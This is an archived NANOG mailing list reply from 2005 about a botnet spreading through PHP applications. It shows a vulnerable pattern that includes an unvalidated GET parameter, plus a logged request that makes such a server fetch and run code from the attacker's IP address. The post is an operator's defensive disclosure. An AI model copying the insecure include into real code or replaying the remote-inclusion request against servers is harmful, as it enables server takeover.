nanog mailing list archives
Re:Destructive botnet originating from Japan
From: "Barrett G. Lyon" <blyon () prolexic com>
Date: Fri, 23 Dec 2005 16:20:00 -0800
Well it appears that bad code always seems to be the root of problems, according to our research today the problem appears to be caused by incorrectly written PHP applications that perform includes using a string without running any validation against the string:
index.php?test=test
$test=$_GET[test];
include("$test.php");
When the include executes the test string passed from the GET
includes execution instructions:
"GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
It appears that the attacker at 210.170.60.2 (also the botnet hosting IRC server) is spreading his code as the include is called, pulling and executing PHP code from a remote server that injects the software.
I'm not sure if this needs to be alerted to anyone outside of this list, but it's pretty nasty.
-Barrett
Current thread:
- Destructive botnet originating from Japan Barrett G. Lyon (Dec 23)
- <Possible follow-ups>
- Re:Destructive botnet originating from Japan Barrett G. Lyon (Dec 23)
- Re:Destructive botnet originating from Japan chuck goolsbee (Dec 25)
- RE: Re:Destructive botnet originating from Japan Hannigan, Martin (Dec 23)
- Re:Destructive botnet originating from Japan Barrett G. Lyon (Dec 24)
- Re:Destructive botnet originating from Japan Rob Thomas (Dec 24)
- Re:Destructive botnet originating from Japan Gadi Evron (Dec 25)
- Re: Destructive botnet originating from Japan Richard A Steenbergen (Dec 25)
- Re: Destructive botnet originating from Japan Gadi Evron (Dec 25)
- Re:Destructive botnet originating from Japan Rob Thomas (Dec 24)
- Re: Destructive botnet originating from Japan Randy Bush (Dec 25)
- Re: Destructive botnet originating from Japan Rubens Kuhl Jr. (Dec 25)